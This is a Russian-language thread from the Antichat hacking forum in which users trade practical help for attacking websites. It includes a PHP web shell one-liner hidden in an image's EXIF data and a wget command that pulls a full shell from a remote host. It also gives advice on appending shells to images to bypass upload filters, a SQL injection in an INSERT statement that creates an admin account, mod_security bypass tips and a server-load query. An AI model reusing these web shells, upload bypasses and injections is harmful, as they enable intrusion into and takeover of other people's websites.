Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    гуглить "mod_security bypass"
     
    _________________________
    2 people like this.
  2. FieryDragon

    FieryDragon New Member

    Joined:
    21 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код
    PHP:
    <?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?>
    ..
    Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста
     
  3. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.
     
  4. FieryDragon

    FieryDragon New Member

    Joined:
    21 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Таки может и поверил бы, если бы знал что да как)За совет спасибо, помогло!
     
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Смотрите в эту cторону:
     
  6. none222

    none222 Guest

    Reputations:
    0
    FieryDragon, раз можешь залить файл с произвольным расширением, значит проверка идет только на хидер картингки и может быть, размер.
    Открываешь через Notepad++ картинку (в которой ты подготовил расширение нужное), мотаешь вниз и в самый конец дописываешь любой свой полноценный шелл.
     
  7. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Error Type:
    Microsoft OLE DB Provider for SQL Server (0x80040E14)
    Incorrect syntax near the keyword 'or'.
     
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Все прекрасно выводит:


    upd

    Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
     
    #23508 YaBtr, 25 Aug 2014
    Last edited: 25 Aug 2014
  9. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    спасибо. Действительно, я и не подумала. Теперь всё отлично
     
  10. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ребят , на сайте пентестер нашел один файл *.php

    содержимое такое:
    [​IMG]

    Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))

    насколько это верно? движок сайта - WP.
     
  11. bumer

    bumer New Member

    Joined:
    4 Nov 2011
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
     
  12. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Раздел "Статьи" и пошел штудировать
     
  13. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Все верно, все файлы *.php в текущем каталоге будут удалены.

    Причем этот файл сам себя удалит, тем самым типа "заметет следы"
     
    #23513 UXOR, 26 Aug 2014
    Last edited: 26 Aug 2014
    1 person likes this.
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Спасибо.
    а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?
    просто смысл удаления всех файлов.. хочу понять мотив.
     
  15. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    B1t.exe, возможно закладка от программера на случай кидка.
     
  16. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Почти верно, с тем отличием что .php удалятся не "на сайте", а только в той же директории, что и сам файл.

    Строго говоря, да, это логическая бомба, но очень примитивная и никак не замаскированная.

    Выше вы упомянули, что сайт на wp. В wp такого кода явно нет, как и "разработчика сайта" в данном случае. Вариантов тут масса, и как уже сказали, это может быть делом рук той мартышки, что ставила вордпресс.
    >> сайт взломали и ставили?
    Этот вопрос вам надо задавать "пентестеру", а не здесь. Смотрите логи(что может быть проблемно, если ворпресс на дешевом\херовом шаред-хостинге), смотрите даты и все что есть по сайту. Одно можно сказать наверняка - в вордпрессе такого нет, что очевидно. К тому же, простое удаление особо бесполезно, т.к. бекапы все-таки принято делать. Скорее всего, где-нибудь есть аналогично оставленное выполнение кода.
     
  17. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    возможно ли использовать sql инъекцию не только на чтение данных но и на запись ?
    например заменить хеш пароля на извесный и провести авторизацию в админку
     
  18. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    GAiN, инъекции бывают в INSERT/UPDATE - соответственно, да, возможно.
    Пример, регистрация:
    Code:
    $username = $_POST['username'];
    $password = $_POST['password'];
    INSERT INTO users ('$username', '$password');
    
    Инъекция:
    Code:
    username=...&password=...'),('admin', 'pass')#
    
     
    #23518 int, 27 Aug 2014
    Last edited: 27 Aug 2014
  19. bumer

    bumer New Member

    Joined:
    4 Nov 2011
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    А не поделиться кто нить списком запросов к бд, через адресную строку. Для нагрузки на сервер.
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    https://forum.antichat.ru/showpost.php?p=407227&postcount=3 читай про BENCHMARK
     
    _________________________
Thread Status:
Not open for further replies.